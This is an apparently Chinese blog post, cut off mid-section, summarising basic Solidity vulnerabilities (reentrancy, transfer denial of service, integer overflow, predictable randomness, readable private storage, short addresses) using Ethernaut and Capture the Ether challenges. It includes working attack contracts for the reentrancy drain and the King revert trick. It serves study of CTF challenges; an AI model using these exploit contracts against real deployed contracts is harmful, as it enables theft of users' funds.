<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="https://raw.githubusercontent.com/bcYng-w/images/main/32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="https://raw.githubusercontent.com/bcYng-w/images/main/16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"bcyng-w.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":4},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="持续更新中！">
<meta property="og:type" content="article">
<meta property="og:title" content="智能合约基础漏洞汇总">
<meta property="og:url" content="http://bcyng-w.github.io/2022/04/10/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/index.html">
<meta property="og:site_name" content="until">
<meta property="og:description" content="持续更新中！">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/50fd76c3-bf36-4b06-8e28-c606be9be0e1.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/3a7d62b8-2060-4b90-b6c3-79be27d2f591.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/d4ee4b39-2255-439e-8ed1-a667e169139c.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/09/c7b43c44-8a35-40b6-8655-c9a2821e9e7e.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/09/a983431c-c880-4fa5-844b-7efdcf7a88d6.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/09/bbcf04db-fbb9-4464-b23a-b302a6eb24bc.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/09/1dc815d7-ac28-4f8f-9bdd-8ddc35289a50.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/09/1e156f74-2f03-401a-920c-e6f7f88055be.png">
<meta property="article:published_time" content="2022-04-09T18:48:25.777Z">
<meta property="article:modified_time" content="2022-04-09T18:47:59.821Z">
<meta property="article:author" content="bcYng">
<meta property="article:tag" content="区块链">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://storage.tttang.com/media/attachment/2022/04/08/50fd76c3-bf36-4b06-8e28-c606be9be0e1.png">

<link rel="canonical" href="http://bcyng-w.github.io/2022/04/10/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>智能合约基础漏洞汇总 | until</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">until</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://bcyng-w.github.io/2022/04/10/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://raw.githubusercontent.com/bcYng-w/images/main/touxaing.png">
      <meta itemprop="name" content="bcYng">
      <meta itemprop="description" content="前程似锦">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="until">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          智能合约基础漏洞汇总
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-04-10 02:48:25 / 修改时间：02:47:59" itemprop="dateCreated datePublished" datetime="2022-04-10T02:48:25+08:00">2022-04-10</time>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>持续更新中！</p>
<span id="more"></span>

<h1 id="1-关于转账的漏洞"><a href="#1-关于转账的漏洞" class="headerlink" title="1.关于转账的漏洞"></a>1.关于转账的漏洞</h1><p>在solidity中有三种转账方式，分别是call，transfer和send，后两者相对安全，但也分别对应着漏洞。</p>
<h2 id="call转账漏洞——重入"><a href="#call转账漏洞——重入" class="headerlink" title="call转账漏洞——重入"></a>call转账漏洞——重入</h2><p>例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">import &#x27;@openzeppelin/contracts/math/SafeMath.sol&#x27;;</span><br><span class="line"></span><br><span class="line">contract Reentrance &#123;</span><br><span class="line">  </span><br><span class="line">  using SafeMath for uint256;</span><br><span class="line">  mapping(address =&gt; uint) public balances;</span><br><span class="line"></span><br><span class="line">  function donate(address _to) public payable &#123;</span><br><span class="line">    balances[_to] = balances[_to].add(msg.value);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function balanceOf(address _who) public view returns (uint balance) &#123;</span><br><span class="line">    return balances[_who];</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function withdraw(uint _amount) public &#123;</span><br><span class="line">    if(balances[msg.sender] &gt;= _amount) &#123;</span><br><span class="line">      (bool result,) = msg.sender.call&#123;value:_amount&#125;(&quot;&quot;);</span><br><span class="line">      if(result) &#123;</span><br><span class="line">        _amount;</span><br><span class="line">      &#125;</span><br><span class="line">      balances[msg.sender] -= _amount;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  receive() external payable &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>原理：call转账会调用所有的gas，并且转账出现异常之后不会抛出异常而是返回false</p>
<p>漏洞分析：经典的重入漏洞，使用了call转账，并且balances[msg.sender]在转账完成之后才进行更新，所以构造攻击合约中的fallback触发即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    test constant private target=test(0xEdBA908c98185b82b1aBb31AFAF66B2f415491B2);</span><br><span class="line">    function cunqian() public payable&#123;</span><br><span class="line">        target.donate&#123;value: 0.001 ether&#125;(address(this));</span><br><span class="line">    &#125;</span><br><span class="line">    function tuiqian()public&#123;</span><br><span class="line">        target.withdraw(0.001 ether);</span><br><span class="line">    &#125;</span><br><span class="line">    function check() public view returns(uint)&#123;</span><br><span class="line">        return address(this).balance;</span><br><span class="line">    &#125;</span><br><span class="line">    fallback() external payable&#123;</span><br><span class="line">        if(address(0xEdBA908c98185b82b1aBb31AFAF66B2f415491B2).balance&gt;=0.001 ether)</span><br><span class="line">        target.withdraw(0.001 ether);</span><br><span class="line">    &#125;</span><br><span class="line">     function reuse() public &#123;</span><br><span class="line">        msg.sender.transfer(address(this).balance);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>相应例题：</p>
<p>ethernaut——re-entrancy <a target="_blank" rel="noopener" href="https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D">https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D</a></p>
<p>capture the ether——Token bank</p>
<p><a target="_blank" rel="noopener" href="https://capturetheether.com/challenges/miscellaneous/token-bank/">https://capturetheether.com/challenges/miscellaneous/token-bank/</a></p>
<h2 id="transfer转账漏洞——拒绝服务"><a href="#transfer转账漏洞——拒绝服务" class="headerlink" title="transfer转账漏洞——拒绝服务"></a>transfer转账漏洞——拒绝服务</h2><p>例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract King &#123;</span><br><span class="line"></span><br><span class="line">  address payable king;</span><br><span class="line">  uint public prize;</span><br><span class="line">  address payable public owner;</span><br><span class="line"></span><br><span class="line">  constructor() public payable &#123;</span><br><span class="line">    owner = msg.sender;  </span><br><span class="line">    king = msg.sender;</span><br><span class="line">    prize = msg.value;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  receive() external payable &#123;</span><br><span class="line">    require(msg.value &gt;= prize || msg.sender == owner);</span><br><span class="line">    king.transfer(msg.value);</span><br><span class="line">    king = msg.sender;</span><br><span class="line">    prize = msg.value;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function _king() public view returns (address payable) &#123;</span><br><span class="line">    return king;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>原理：transfer函数如果异常会转账失败，抛出异常。并且有gas限制，最大2300，避免了重入漏洞。</p>
<p>漏洞分析：题目就是要求成为king，但是题目会进行king的重申，而transfer函数不同于call和send，call和send函数执行后会返回true或者false，transfer函数执行失败后会进行回滚(revert)所以我们将king变成自己后提交实例时要阻止关卡对于king的重申，简单来说就是让关卡触发receive函数时失败。直接使用revert让关卡在想攻击合约转账时失败以上两种方法可以使漏洞合约中的transfer函数执行失败从而进行回滚导致king的重申失败。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    address target =0xd4c14dEeE2d55e2F999FFaAdb8d11CC7c6f67909;</span><br><span class="line">    function attack() payable public &#123;</span><br><span class="line">        target.call&#123;value : 0.001 ether&#125;(&quot;&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    fallback() external payable &#123;</span><br><span class="line">        revert();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>相应例题：</p>
<p>ethernaut——King</p>
<p><a target="_blank" rel="noopener" href="https://ethernaut.openzeppelin.com/level/0x43BA674B4fbb8B157b7441C2187bCdD2cdF84FD5">https://ethernaut.openzeppelin.com/level/0x43BA674B4fbb8B157b7441C2187bCdD2cdF84FD5</a></p>
<h1 id="2-整数溢出漏洞"><a href="#2-整数溢出漏洞" class="headerlink" title="2.整数溢出漏洞"></a>2.整数溢出漏洞</h1><h2 id="溢出漏洞"><a href="#溢出漏洞" class="headerlink" title="溢出漏洞"></a>溢出漏洞</h2><p>原理：</p>
<p>在solidity中有两种整数的表达方式，分别是int和uint，代表有符号和无符号整数，整数溢出漏洞存在于uint中，比如uint(0-1)就相当于2^256-1，系那个一个小数字变成一个极大的数，分为上溢出和下溢处。通常使msg.value上溢出让交易金额变小，使余额下溢处获得更多余额。</p>
<p>例一，msg.value上溢出：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.21;</span><br><span class="line"></span><br><span class="line">contract TokenSaleChallenge &#123;</span><br><span class="line">    mapping(address =&gt; uint256) public balanceOf;</span><br><span class="line">    uint256 constant PRICE_PER_TOKEN = 1 ether;</span><br><span class="line"></span><br><span class="line">    function TokenSaleChallenge(address _player) public payable &#123;</span><br><span class="line">        require(msg.value == 1 ether);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function isComplete() public view returns (bool) &#123;</span><br><span class="line">        return address(this).balance &lt; 1 ether;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function buy(uint256 numTokens) public payable &#123;</span><br><span class="line">        require(msg.value == numTokens * PRICE_PER_TOKEN);</span><br><span class="line"></span><br><span class="line">        balanceOf[msg.sender] += numTokens;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function sell(uint256 numTokens) public &#123;</span><br><span class="line">        require(balanceOf[msg.sender] &gt;= numTokens);</span><br><span class="line"></span><br><span class="line">        balanceOf[msg.sender] -= numTokens;</span><br><span class="line">        msg.sender.transfer(numTokens * PRICE_PER_TOKEN);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>buy函数中require msg.value &#x3D;&#x3D; numTokens * PRICE_PER_TOKEN，其中PRICE_PER_TOKEN固定为1 ether，而numTokens。</p>
<p>require直接进行乘法，没有检测计算值后得到的数值，在此处可以构造整数溢出漏洞从而使msg.value变成一个足够小的数值。</p>
<p>例二，余额下溢处</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Token &#123;</span><br><span class="line"></span><br><span class="line">  mapping(address =&gt; uint) balances;</span><br><span class="line">  uint public totalSupply;</span><br><span class="line"></span><br><span class="line">  constructor(uint _initialSupply) public &#123;</span><br><span class="line">    balances[msg.sender] = totalSupply = _initialSupply;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function transfer(address _to, uint _value) public returns (bool) &#123;</span><br><span class="line">    require(balances[msg.sender] - _value &gt;= 0);</span><br><span class="line">    balances[msg.sender] -= _value;</span><br><span class="line">    balances[_to] += _value;</span><br><span class="line">    return true;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function balanceOf(address _owner) public view returns (uint balance) &#123;</span><br><span class="line">    return balances[_owner];</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析：一道非常简单的题目，看似逻辑比较严谨，但是注意 require(balances[msg.sender] - _value &gt;&#x3D; 0)一行，要知道，uint类型中0-1是大于且远远大于0的，此处存在溢出漏洞，并且value可控，直接计算value使余额下溢。</p>
<p>相应例题：</p>
<p>capture the ether——Token sale</p>
<p><a target="_blank" rel="noopener" href="https://capturetheether.com/challenges/math/token-sale/">https://capturetheether.com/challenges/math/token-sale/</a></p>
<p>ethernaut—Token</p>
<p><a target="_blank" rel="noopener" href="https://ethernaut.openzeppelin.com/level/0x63bE8347A617476CA461649897238A31835a32CE">https://ethernaut.openzeppelin.com/level/0x63bE8347A617476CA461649897238A31835a32CE</a></p>
<h1 id="3-随机数漏洞"><a href="#3-随机数漏洞" class="headerlink" title="3.随机数漏洞"></a>3.随机数漏洞</h1><p>原理：</p>
<p>合约使用外界未知的私有变量参与随机数生成。虽然变量是私有的，无法通过另一合约访问，但是变量储存进 storage 之后仍然是公开的。</p>
<p>或者使用，hash，coinbase、timestamp、number、difficulty、gaslimit等类型值作为随机数的，也存在安全问题，因为这些变量都是已知或者可操控的，比如在同意笔交易中，blockhash，blocnumber等均是相同的。值得注意的是blockhash只能读取最近的256个区块，在之前的将直接返回0。</p>
<p>例一，变量经过存储之后可查询</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.18;</span><br><span class="line"></span><br><span class="line">contract Vault &#123;</span><br><span class="line">  bool public locked;</span><br><span class="line">  bytes32 private password;</span><br><span class="line"></span><br><span class="line">  function Vault(bytes32 _password) public &#123;</span><br><span class="line">    locked = true;</span><br><span class="line">    password = _password;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function unlock(bytes32 _password) public &#123;</span><br><span class="line">    if (password == _password) &#123;</span><br><span class="line">      locked = false;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析：password直接存储在slot1，而在区块链中，数据可以直接查询，利用如下代码即可获得password</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">print</span>(web3.eth.getStorageAt(contractaddress,<span class="number">1</span>))</span><br></pre></td></tr></table></figure>

<p>相应例题：</p>
<p>ethernaut——Vault：<a target="_blank" rel="noopener" href="https://ethernaut.openzeppelin.com/level/0xf94b476063B6379A3c8b6C836efB8B3e10eDe188">https://ethernaut.openzeppelin.com/level/0xf94b476063B6379A3c8b6C836efB8B3e10eDe188</a></p>
<p>例二，使用区块链变量</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.21;</span><br><span class="line"></span><br><span class="line">contract GuessTheNewNumberChallenge &#123;</span><br><span class="line">    function GuessTheNewNumberChallenge() public payable &#123;</span><br><span class="line">        require(msg.value == 1 ether);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function isComplete() public view returns (bool) &#123;</span><br><span class="line">        return address(this).balance == 0;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function guess(uint8 n) public payable &#123;</span><br><span class="line">        require(msg.value == 1 ether);</span><br><span class="line">        uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));</span><br><span class="line"></span><br><span class="line">        if (n == answer) &#123;</span><br><span class="line">            msg.sender.transfer(2 ether);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析：使用了区块链变量的伪随机数，同一笔交易中block.blockhash(block.number)和now均相同，直接再调用时让n&#x3D;&#x3D;uint8(keccak256(block.blockhash(block.number - 1), now))就可以了</p>
<p>相应例题：</p>
<p>capture the ether——Guess the new number：<a target="_blank" rel="noopener" href="https://capturetheether.com/challenges/lotteries/guess-the-new-number/">https://capturetheether.com/challenges/lotteries/guess-the-new-number/</a></p>
<p>例三，关于blockhash只能读取最近256区块</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.21;</span><br><span class="line"></span><br><span class="line">contract PredictTheBlockHashChallenge &#123;</span><br><span class="line">    address guesser;</span><br><span class="line">    bytes32 guess;</span><br><span class="line">    uint256 settlementBlockNumber;</span><br><span class="line"></span><br><span class="line">    function PredictTheBlockHashChallenge() public payable &#123;</span><br><span class="line">        require(msg.value == 1 ether);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function isComplete() public view returns (bool) &#123;</span><br><span class="line">        return address(this).balance == 0;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function lockInGuess(bytes32 hash) public payable &#123;</span><br><span class="line">        require(guesser == 0);</span><br><span class="line">        require(msg.value == 1 ether);</span><br><span class="line"></span><br><span class="line">        guesser = msg.sender;</span><br><span class="line">        guess = hash;</span><br><span class="line">        settlementBlockNumber = block.number + 1;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function settle() public &#123;</span><br><span class="line">        require(msg.sender == guesser);</span><br><span class="line">        require(block.number &gt; settlementBlockNumber);</span><br><span class="line"></span><br><span class="line">        bytes32 answer = block.blockhash(settlementBlockNumber);</span><br><span class="line"></span><br><span class="line">        guesser = 0;</span><br><span class="line">        if (guess == answer) &#123;</span><br><span class="line">            msg.sender.transfer(2 ether);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析：block.blockhash这个函数，它可以获取给定的区块号的hash值，但只支持最近的256个区块，不包含当前区块，对于256个区块之前的函数将返回0，所以应该提前设置guess为0，再等待255+1个区块。</p>
<p>相应例题：</p>
<p>capture the ether——Predict the block hash：<a target="_blank" rel="noopener" href="https://capturetheether.com/challenges/lotteries/predict-the-block-hash/">https://capturetheether.com/challenges/lotteries/predict-the-block-hash/</a></p>
<h1 id="4-短地址漏洞"><a href="#4-短地址漏洞" class="headerlink" title="4.短地址漏洞"></a>4.短地址漏洞</h1><p>正常用户从交易所取款或者转账时，先输入正确的地址，在输入小于或等于自己存储的以太币的数量，然后完成存取款。</p>
<p>在调用函数时的input分为三个部分，接下来以erc20的transfer为例：</p>
<p>part 1： 4字节，方法名的hash值，即transfer.selector。</p>
<p>part 2：32字节，存储以太坊的地址，即20字节的address，未满足32字节，高位补0.</p>
<p>part 3：32字节，需要传输的代币数量，未满足32字节则高位补0.</p>
<p>上述三部分接合起来就是交易数据。</p>
<p>在这个过程中，如果交易所或者钱包方没有校验用户输入的地址长度是否合法，就存在短地址漏洞。</p>
<p>假设现在有合法地址0x1234567890123456789012345678901234567800。</p>
<p>注意末尾的00，问题就处在地址末尾处的00，当我们将后面的00省略，然后将参数传递给智能合约时，参数将根据ABI规范进行编码。在00省略的情况下我们发送的就是19字节(38位地址)而不是20字节的标准地址，在这种情况下，EVM会自动从下一个参数的最高位拿到1个字节(2个十六进制位)来补充以达到预期长度，这就导致了段地址漏洞。</p>
<p>比如在如下测试代码中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.11</span><br><span class="line">contract shortaddr &#123;</span><br><span class="line">    mapping(address=&gt;uint)balanceOf;</span><br><span class="line">    constructor() public&#123;</span><br><span class="line">        balanceOf[msg.sender]=1000;</span><br><span class="line">    &#125;</span><br><span class="line">    function transfer(address to,uint amount) public&#123;</span><br><span class="line">        require(balanceOf[msg.sender]&gt;=amount);</span><br><span class="line">        balanceOf[msg.sender]-=amount;</span><br><span class="line">        balanceOf[to]+=amount;</span><br><span class="line">    &#125;</span><br><span class="line">    function getbalance(address addr)view returns(uint)&#123;</span><br><span class="line">        return balanceOf[addr];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>调用transfer函数并且使用上述短地址，转账5个token，amount参数最高位的00将会被吞掉，原本的转账5token将会变成转账0x500个token即900个，所以有较大风险。</p>
<p>不过该漏洞几乎已经被修复，还没有遇到过相应的例题。</p>
<p>不能通过 Remix 复现，因为客户端会检查地址长度；也不能通过 sendTransaction()，因为 <code>web3</code> 中也加了保护。</p>
<p>但是，可以使用 <strong>geth</strong> 搭建私链，使用 sendRawTransaction() 发送交易复现，可进行复现。</p>
<h1 id="5-call调用漏洞"><a href="#5-call调用漏洞" class="headerlink" title="5.call调用漏洞"></a>5.call调用漏洞</h1><p>call调用分为call，callcode以及delegatecal 原理：</p>
